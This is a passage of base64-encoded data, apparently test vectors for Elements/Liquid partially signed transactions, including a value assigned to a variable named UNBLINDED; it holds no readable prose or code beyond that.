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"
UNBLINDED = "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